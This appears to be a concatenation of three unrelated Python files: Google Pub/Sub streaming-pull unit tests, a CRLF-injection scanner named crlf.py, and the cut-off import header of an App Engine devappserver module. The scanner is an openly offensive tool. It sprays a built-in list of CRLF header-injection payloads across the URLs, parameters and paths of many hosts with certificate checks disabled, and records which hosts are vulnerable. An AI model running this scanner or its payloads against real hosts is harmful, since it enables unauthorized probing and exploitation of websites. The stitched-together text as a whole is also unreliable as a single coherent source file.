# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from six.moves import queue
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.gapic import subscriber_client_config
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
import grpc
@pytest.mark.parametrize(
"exception,expected_cls",
[
(ValueError("meep"), ValueError),
(
mock.create_autospec(grpc.RpcError, instance=True),
exceptions.GoogleAPICallError,
),
],
)
def test__maybe_wrap_exception(exception, expected_cls):
assert isinstance(
streaming_pull_manager._maybe_wrap_exception(exception), expected_cls
)
def test__wrap_callback_errors_no_error():
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock()
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
callback.assert_called_once_with(msg)
msg.nack.assert_not_called()
on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
callback_error = ValueError("meep")
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock(side_effect=callback_error)
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
msg.nack.assert_called_once()
on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client, mock.sentinel.subscription
)
# Public state
assert manager.is_active is False
assert manager.flow_control == types.FlowControl()
assert manager.dispatcher is None
assert manager.leaser is None
assert manager.ack_histogram is not None
assert manager.ack_deadline == 10
assert manager.load == 0
# Private state
assert manager._client == mock.sentinel.client
assert manager._subscription == mock.sentinel.subscription
assert manager._scheduler is not None
def test_constructor_with_options():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client,
mock.sentinel.subscription,
flow_control=mock.sentinel.flow_control,
scheduler=mock.sentinel.scheduler,
)
assert manager.flow_control == mock.sentinel.flow_control
assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
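    """Build a StreamingPullManager wired to a mocked client and scheduler."""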
client_ = mock.create_autospec(client.Client, instance=True)
scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
return streaming_pull_manager.StreamingPullManager(
client_, "subscription-name", scheduler=scheduler_, **kwargs
)
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
"""Add a simplified fake add() method to a leaser instance.
The fake add() method actually increases the leaser's internal message count
by one for each message, and the total bytes by ``assumed_msg_size`` for
each message (regardless of the actual message size).
"""
def fake_add(self, items):
self.message_count += len(items)
self.bytes += len(items) * assumed_msg_size
leaser.message_count = init_msg_count
leaser.bytes = init_msg_count * assumed_msg_size
leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
manager = make_manager()
assert manager.ack_deadline == 10
manager.ack_histogram.add(20)
assert manager.ack_deadline == 20
manager.ack_histogram.add(10)
assert manager.ack_deadline == 20
def test_maybe_pause_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_pause_consumer() # no raise
# Ensure load > 1
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 100
_leaser.bytes = 10000
manager.maybe_pause_consumer() # no raise
def test_lease_load_and_pause():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# This should mean that our messages count is at 10%, and our bytes
# are at 15%; load should return the higher (0.15), and shouldn't cause
# the consumer to pause.
manager.leaser.add([requests.LeaseRequest(ack_id="one", byte_size=150)])
assert manager.load == 0.15
manager.maybe_pause_consumer()
manager._consumer.pause.assert_not_called()
# After this message is added, the messages should be higher at 20%
# (versus 16% for bytes).
manager.leaser.add([requests.LeaseRequest(ack_id="two", byte_size=10)])
assert manager.load == 0.2
# Returning a number above 100% is fine, and it should cause this to pause.
manager.leaser.add([requests.LeaseRequest(ack_id="three", byte_size=1000)])
assert manager.load == 1.16
manager.maybe_pause_consumer()
manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = True
# Add several messages until we're over the load threshold.
manager.leaser.add(
[
requests.LeaseRequest(ack_id="one", byte_size=750),
requests.LeaseRequest(ack_id="two", byte_size=250),
]
)
assert manager.load == 1.0
# Trying to resume now should have no effect as we're over the threshold.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
    # Drop the 250 byte message, which should put us under the resume
    # threshold.
manager.leaser.remove([requests.DropRequest(ack_id="two", byte_size=250)])
manager.maybe_resume_consumer()
manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
    # Resuming should have no effect if the consumer is not actually paused.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_resume_consumer() # no raise
def test__maybe_release_messages_on_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
# Ensure load is exactly 1.0 (to verify that >= condition is used)
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 10
_leaser.bytes = 1000
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
manager._messages_on_hold.put(msg)
manager._maybe_release_messages()
assert manager._messages_on_hold.qsize() == 1
manager._leaser.add.assert_not_called()
manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._callback = mock.sentinel.callback
# init leaser message count to 8 to leave room for 2 more messages
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
fake_leaser_add(_leaser, init_msg_count=8, assumed_msg_size=25)
_leaser.add = mock.Mock(wraps=_leaser.add) # to spy on calls
messages = [
mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=11),
mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=22),
mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=33),
]
for msg in messages:
manager._messages_on_hold.put(msg)
# the actual call of MUT
manager._maybe_release_messages()
assert manager._messages_on_hold.qsize() == 1
msg = manager._messages_on_hold.get_nowait()
assert msg.ack_id == "ack_baz"
assert len(_leaser.add.mock_calls) == 2
expected_calls = [
mock.call([requests.LeaseRequest(ack_id="ack_foo", byte_size=11)]),
mock.call([requests.LeaseRequest(ack_id="ack_bar", byte_size=22)]),
]
_leaser.add.assert_has_calls(expected_calls)
schedule_calls = manager._scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for _, call_args, _ in schedule_calls:
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test_send_unary():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(
types.StreamingPullRequest(
ack_ids=["ack_id1", "ack_id2"],
modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
modify_deadline_seconds=[10, 20, 20],
)
)
manager._client.acknowledge.assert_called_once_with(
subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
)
manager._client.modify_ack_deadline.assert_has_calls(
[
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id3"],
ack_deadline_seconds=10,
),
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id4", "ack_id5"],
ack_deadline_seconds=20,
),
],
any_order=True,
)
def test_send_unary_empty():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(types.StreamingPullRequest())
manager._client.acknowledge.assert_not_called()
manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
caplog.set_level(logging.DEBUG)
manager = make_manager()
manager._UNARY_REQUESTS = True
error = exceptions.GoogleAPICallError("The front fell off")
manager._client.acknowledge.side_effect = error
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
caplog.set_level(logging.DEBUG)
manager, _, _, _, _, _ = make_running_manager()
manager._UNARY_REQUESTS = True
error = exceptions.RetryError(
"Too long a transient error", cause=Exception("Out of time!")
)
manager._client.acknowledge.side_effect = error
with pytest.raises(exceptions.RetryError):
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "RetryError while sending unary RPC" in caplog.text
assert "signaled streaming pull manager shutdown" in caplog.text
def test_send_streaming():
manager = make_manager()
manager._UNARY_REQUESTS = False
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager.send(mock.sentinel.request)
manager._rpc.send.assert_called_once_with(mock.sentinel.request)
def test_heartbeat():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = True
manager.heartbeat()
manager._rpc.send.assert_called_once_with(types.StreamingPullRequest())
def test_heartbeat_inactive():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = False
manager.heartbeat()
manager._rpc.send.assert_not_called()
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
stream_ack_deadline = streaming_pull_manager._DEFAULT_STREAM_ACK_DEADLINE
manager = make_manager()
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
heartbeater.assert_called_once_with(manager)
heartbeater.return_value.start.assert_called_once()
assert manager._heartbeater == heartbeater.return_value
dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
dispatcher.return_value.start.assert_called_once()
assert manager._dispatcher == dispatcher.return_value
leaser.assert_called_once_with(manager)
leaser.return_value.start.assert_called_once()
assert manager.leaser == leaser.return_value
background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
background_consumer.return_value.start.assert_called_once()
assert manager._consumer == background_consumer.return_value
resumable_bidi_rpc.assert_called_once_with(
start_rpc=manager._client.api.streaming_pull,
initial_request=mock.ANY,
should_recover=manager._should_recover,
should_terminate=manager._should_terminate,
throttle_reopen=True,
)
initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
assert initial_request_arg.func == manager._get_initial_request
assert initial_request_arg.args[0] == stream_ack_deadline
assert not manager._client.api.get_subscription.called
resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
manager._on_rpc_done
)
assert manager._rpc == resumable_bidi_rpc.return_value
manager._consumer.is_active = True
assert manager.is_active is True
def test_open_already_active():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
with pytest.raises(ValueError, match="already open"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
manager = make_manager()
manager._closed = True
with pytest.raises(ValueError, match="closed"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def make_running_manager():
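    """Build a manager whose consumer, dispatcher, leaser and heartbeater are all
    mocks, as if open() had already been called successfully."""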
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
return (
manager,
manager._consumer,
manager._dispatcher,
manager._leaser,
manager._heartbeater,
manager._scheduler,
)
def test_close():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
manager.close()
consumer.stop.assert_called_once()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
assert manager.is_active is False
def test_close_inactive_consumer():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
consumer.is_active = False
manager.close()
consumer.stop.assert_not_called()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
def test_close_idempotent():
manager, _, _, _, _, scheduler = make_running_manager()
manager.close()
manager.close()
assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
def __init__(self, manager, error_callback):
self._manager = manager
self._error_callback = error_callback
self._thread = None
self._stop = False
def start(self):
self._thread = threading.Thread(target=self._do_work)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
self._thread.join()
self._thread = None
def _do_work(self):
while not self._stop:
try:
self._manager.leaser.add([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
time.sleep(0.1)
# also try to interact with the leaser after the stop flag has been set
try:
self._manager.leaser.remove([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
def test_close_no_dispatcher_error():
manager, _, _, _, _, _ = make_running_manager()
error_callback = mock.Mock(name="error_callback")
dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
manager._dispatcher = dispatcher
dispatcher.start()
manager.close()
error_callback.assert_not_called()
def test_close_callbacks():
manager, _, _, _, _, _ = make_running_manager()
callback = mock.Mock()
manager.add_close_callback(callback)
manager.close(reason="meep")
callback.assert_called_once_with(manager, "meep")
def test__get_initial_request():
manager = make_manager()
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._leaser.ack_ids = ["1", "2"]
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == ["1", "2"]
assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
manager = make_manager()
manager._leaser = None
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == []
assert initial_request.modify_deadline_seconds == []
def test__on_response_no_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for call in schedule_calls:
assert call[1][0] == mock.sentinel.callback
assert isinstance(call[1][1], message.Message)
# the leaser load limit not hit, no messages had to be put on hold
assert manager._messages_on_hold.qsize() == 0
def test__on_response_with_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
types.ReceivedMessage(
ack_id="zack", message=types.PubsubMessage(data=b"baz", message_id="3")
),
]
)
# Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
# the default FlowControl.max_messages limit.
fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
# only the messages that are added to the lease management and dispatched to
# callbacks should have their ACK deadline extended
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10)]
)
# one message should be scheduled, the leaser capacity allows for it
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 1
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
# the rest of the messages should have been put on hold
assert manager._messages_on_hold.qsize() == 2
while True:
try:
msg = manager._messages_on_hold.get_nowait()
except queue.Empty:
break
else:
assert isinstance(msg, message.Message)
assert msg.message_id in ("2", "3")
def test_retryable_stream_errors():
# Make sure the config matches our hard-coded tuple of exceptions.
interfaces = subscriber_client_config.config["interfaces"]
retry_codes = interfaces["google.pubsub.v1.Subscriber"]["retry_codes"]
idempotent = retry_codes["idempotent"]
status_codes = tuple(getattr(grpc.StatusCode, name, None) for name in idempotent)
expected = tuple(
exceptions.exception_class_for_grpc_status(status_code)
for status_code in status_codes
)
assert set(expected).issubset(set(streaming_pull_manager._RETRYABLE_STREAM_ERRORS))
def test__should_recover_true():
manager = make_manager()
details = "UNAVAILABLE. Service taking nap."
exc = exceptions.ServiceUnavailable(details)
assert manager._should_recover(exc) is True
def test__should_recover_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_recover(exc) is False
def test__should_terminate_true():
manager = make_manager()
details = "Cancelled. Go away, before I taunt you a second time."
exc = exceptions.Cancelled(details)
assert manager._should_terminate(exc) is True
def test__should_terminate_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_terminate(exc) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
manager = make_manager()
manager._on_rpc_done(mock.sentinel.error)
thread.assert_called_once_with(
name=mock.ANY, target=manager.close, kwargs={"reason": mock.sentinel.error}
)
|
crlf.py
|
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import copy
import random
import argparse
import requests
import urllib.parse
from functools import partial
from threading import Thread
from queue import Queue
from multiprocessing.dummy import Pool
from colored import fg, bg, attr
MAX_EXCEPTION = 3
MAX_VULNERABLE = 5
# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def banner():
print("""
_ __
___ _ __| |/ _| _ __ _ _
/ __| '__| | |_ | '_ \| | | |
| (__| | | | _| _ | |_) | |_| |
\___|_| |_|_| (_) | .__/ \__, |
|_| |___/
by @gwendallecoguic
""")
pass
banner()
def rebuiltQuery( t_params ):
query = ''
for pname,t_values in t_params.items():
for k in range(len(t_values)):
query = query + pname+'='+t_values[k] + '&'
return query.strip('&')
def _parse_qs( query ):
t_params = {}
tmptab = query.split('&')
for param in tmptab:
t_param = param.split('=')
pname = t_param[0]
if not pname in t_params:
t_params[pname] = []
pvalue = '' if len(t_param) < 2 else t_param[1]
t_params[pname].append( pvalue )
return t_params
def testParams( t_urlparse, payload ):
# t_params = urllib.parse.parse_qs( t_urlparse.query )
t_params = _parse_qs( t_urlparse.query )
for pname,t_values in t_params.items():
for k in range(len(t_values)):
pvalue = t_values[k]
t_params2 = copy.deepcopy(t_params)
if pvalue == '':
pvalue = 666
new_value = str(pvalue) + payload
# t_params2[pname][k] = urllib.parse.quote( new_value )
t_params2[pname][k] = new_value
new_query = rebuiltQuery( t_params2 )
t_urlparse = t_urlparse._replace(query=new_query)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
# disable get/post swap
# t_urlparse = t_urlparse._replace(query='')
# url = urllib.parse.urlunparse(t_urlparse)
# doTest( url, 'POST', t_params2 )
def testFragment( t_urlparse, payload ):
# new_value = t_urlparse.fragment + urllib.parse.quote(payload)
new_value = t_urlparse.fragment + payload
t_urlparse = t_urlparse._replace(fragment=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
def testPath( t_urlparse, payload ):
path = ''
t_path = ['/'] + t_urlparse.path.split('/')
for dir in t_path:
if len(dir):
path = path + '/' + dir
path = path.replace('//','/')
# new_value = os.path.dirname(t_urlparse.path) + '/' + urllib.parse.quote(payload)
# new_value = path + '/' + urllib.parse.quote(payload)
new_value = path + '/' + payload
new_value = new_value.replace('//','/')
t_urlparse = t_urlparse._replace(path=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
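# Try the payload in every position that might get reflected: each query
# parameter value, the URL fragment, and the path.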
def testPayload( url, payload ):
t_urlparse = urllib.parse.urlparse( url )
if len(t_urlparse.query):
testParams( t_urlparse, payload.strip('/') )
if len(t_urlparse.fragment):
testFragment( t_urlparse, payload.strip('/') )
testPath( t_urlparse, payload )
def testURL( url ):
time.sleep( 0.01 )
if _verbose <= 1:
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
pool = Pool( 10 )
pool.map( partial(testPayload,url), t_payloads )
pool.close()
pool.join()
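# Request a candidate URL and flag it as vulnerable when the injected
# "Xcrlf: 1" header shows up in the response headers, i.e. the CRLF sequence
# really did split a new header server-side.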
def doTest( url, method='GET', post_params='' ):
t_urlparse = urllib.parse.urlparse(url)
u = t_urlparse.scheme + '_' + t_urlparse.netloc
if not u in t_exceptions:
t_exceptions[u] = 0
if t_exceptions[u] >= MAX_EXCEPTION:
if _verbose >= 3:
print("skip too many exceptions %s" % t_urlparse.netloc)
return
if not u in t_vulnerable:
t_vulnerable[u] = 0
if t_vulnerable[u] >= MAX_VULNERABLE:
if _verbose >= 3:
print("skip already vulnerable %s" % t_urlparse.netloc)
return
try:
if method == 'POST':
r = requests.post( url, data=post_params, headers=t_custom_headers, timeout=5, verify=False )
else:
r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False )
except Exception as e:
t_exceptions[u] = t_exceptions[u] + 1
if _verbose >= 3:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return
if 'Content-Type' in r.headers:
content_type = r.headers['Content-Type']
else:
content_type = '-'
t_headers = list( map( str.lower,r.headers.keys() ) )
if 'xcrlf' in t_headers:
vuln = 'VULNERABLE'
else:
vuln = '-'
if vuln == 'VULNERABLE':
t_vulnerable[u] = t_vulnerable[u] + 1
# output = '%sC=%d\t\tT=%s\t\tV=%s\n' % (url.ljust(t_multiproc['u_max_length']),r.status_code,content_type,vuln)
output = '%s\t\tC=%d\t\tT=%s\t\tV=%s\n' % (url,r.status_code,content_type,vuln)
fp = open( t_multiproc['f_output'], 'a+' )
fp.write( output )
fp.close()
if _verbose >= 2 or (_verbose >= 1 and vuln == 'VULNERABLE'):
if vuln == 'VULNERABLE':
sys.stdout.write( '%s%s%s' % (fg('light_red'),output,attr(0)) )
else:
sys.stdout.write( output )
parser = argparse.ArgumentParser()
parser.add_argument( "-a","--path",help="set paths list" )
parser.add_argument( "-d","--header",help="custom headers, example: cookie1=value1;cookie2=value2...", action="append" )
parser.add_argument( "-p","--payloads",help="set payloads list" )
parser.add_argument( "-o","--hosts",help="set host list (required or -u)" )
# parser.add_argument( "-r","--redirect",help="follow redirection" )
parser.add_argument( "-s","--scheme",help="scheme to use, default=http,https" )
parser.add_argument( "-t","--threads",help="threads, default 10" )
parser.add_argument( "-u","--urls",help="set url list (required or -o)" )
parser.add_argument( "-v","--verbose",help="display output, 0=nothing, 1=only vulnerable, 2=all requests, 3=full debug, default: 1" )
args = parser.parse_args()
if args.scheme:
t_scheme = args.scheme.split(',')
else:
t_scheme = ['http','https']
t_custom_headers = {}
if args.header:
for header in args.header:
if ':' in header:
tmp = header.split(':')
t_custom_headers[ tmp[0].strip() ] = tmp[1].strip()
t_hosts = []
if args.hosts:
if os.path.isfile(args.hosts):
fp = open( args.hosts, 'r' )
t_hosts = fp.read().strip().split("\n")
fp.close()
else:
t_hosts.append( args.hosts )
n_hosts = len(t_hosts)
sys.stdout.write( '%s[+] %d hosts found: %s%s\n' % (fg('green'),n_hosts,args.hosts,attr(0)) )
t_urls = []
if args.urls:
if os.path.isfile(args.urls):
fp = open( args.urls, 'r' )
t_urls = fp.read().strip().split("\n")
fp.close()
else:
t_urls.append( args.urls )
n_urls = len(t_urls)
sys.stdout.write( '%s[+] %d urls found: %s%s\n' % (fg('green'),n_urls,args.urls,attr(0)) )
if n_hosts == 0 and n_urls == 0:
parser.error( 'hosts/urls list missing' )
t_path = [ '' ]
if args.path:
if os.path.isfile(args.path):
fp = open( args.path, 'r' )
t_path = fp.read().strip().split("\n")
fp.close()
else:
t_path.append( args.path )
n_path = len(t_path)
sys.stdout.write( '%s[+] %d path found: %s%s\n' % (fg('green'),n_path,args.path,attr(0)) )
if args.payloads:
t_payloads = []
if os.path.isfile(args.payloads):
fp = open( args.payloads, 'r' )
t_payloads = fp.read().strip().split("\n")
fp.close()
else:
t_payloads.append( args.payloads )
n_payloads = len(t_payloads)
sys.stdout.write( '%s[+] %d payloads found: %s%s\n' % (fg('green'),n_payloads,args.payloads,attr(0)) )
else:
n_payloads = 0
if args.verbose:
_verbose = int(args.verbose)
else:
_verbose = 1
if args.threads:
_threads = int(args.threads)
else:
_threads = 10
t_totest = []
u_max_length = 0
d_output = os.getcwd()+'/crlf'
f_output = d_output + '/' + 'output'
if not os.path.isdir(d_output):
try:
os.makedirs( d_output )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
sys.stdout.write( '%s[+] options are -> threads:%d, verbose:%d%s\n' % (fg('green'),_threads,_verbose,attr(0)) )
sys.stdout.write( '[+] computing host and payload list...\n' )
# source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
if not n_payloads:
t_payloads = [
'/%0dXcrlf%3a1',
'/%0aXcrlf%3a1',
'/%0d%0aXcrlf%3a1',
'/?%0dXcrlf%3acrlf=1',
'/%3F%0aXcrlf%3acrlf=1',
'/%0aXcrlf%3a1/..',
'/%23%0dXcrlf:1',
'/%23%0aXcrlf:1',
'/%23%0d%0aXcrlf:1',
'/xxx%0dXcrlf:1',
'/xxx%0aXcrlf:1',
'/xxx%0d%0aXcrlf:1',
'//xxx%0dXcrlf:1;',
'//xxx%0aXcrlf:1;',
'//xxx%0d%0aXcrlf:1;',
'/xxx/x%23%0dXcrlf:1',
'/xxx/x%3F%0dXcrlf:1',
'/v1/xx%20xx%0d%0aXcrlf:1',
'/api/v1/see%20below%0d%0aXcrlf:1',
'/%E5%98%8a%E5%98%8dXcrlf:1',
'/~bin/%0d%0aXcrlf:1',
]
for scheme in t_scheme:
for host in t_hosts:
for path in t_path:
u = scheme + '://' + host.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
for url in t_urls:
for path in t_path:
u = url.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
n_totest = len(t_totest)
sys.stdout.write( '%s[+] %d urls created.%s\n' % (fg('green'),n_totest,attr(0)) )
sys.stdout.write( '[+] testing...\n' )
random.shuffle(t_totest)
# print("\n".join(t_totest))
# exit()
t_exceptions = {}
t_vulnerable = {}
t_multiproc = {
'n_current': 0,
'n_total': n_totest,
'u_max_length': u_max_length+5,
'd_output': d_output,
'f_output': f_output,
}
def doWork():
while True:
url = q.get()
testURL( url )
q.task_done()
q = Queue( _threads*2 )
for i in range(_threads):
t = Thread( target=doWork )
t.daemon = True
t.start()
try:
for url in t_totest:
q.put( url )
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from past.utils import old_div
from builtins import object
import collections
import io
import functools
import six.moves.http_client
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import six.moves.urllib.parse
import wsgiref.headers
from concurrent import futures
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
